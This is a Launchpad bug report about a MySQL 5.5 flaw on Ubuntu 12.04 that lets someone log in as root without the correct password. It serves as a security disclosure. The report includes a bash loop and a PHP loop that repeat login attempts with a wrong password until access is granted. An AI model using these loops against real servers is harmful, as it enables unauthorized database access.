mysql login possible without knowing password

Bug #1011602 reported by sseitz on 2012-06-11
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
mysql-5.5 (Ubuntu)
Undecided
Unassigned

Bug Description

Running Ubuntu 12.04 LTS 64bit, it's possible to get access to mysql (mysql-server 5.5.22-0ubuntu1) by only knowing a username.

I've tested on a few different distributions/versions, but only Ubuntu12.04 LTS (I only have 64bit at hand) shows that problem.

I tried that bash line:

for i in `seq 1 1000`; do mysql -u root --password=something -h 127.0.0.1 2>/dev/null; done

also a few lines of php work the very same way:

<?php
$n=0;
while (!$db=@mysql_connect('localhost','root','something')) { $n++; }
echo 'got it after '.$n." trials\r\n";

I assume this is a big security problem.

visibility: private → public
sseitz (s-seitz) wrote :

Forgot to add the original post which made me aware of the bug:

http://seclists.org/oss-sec/2012/q2/493

To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers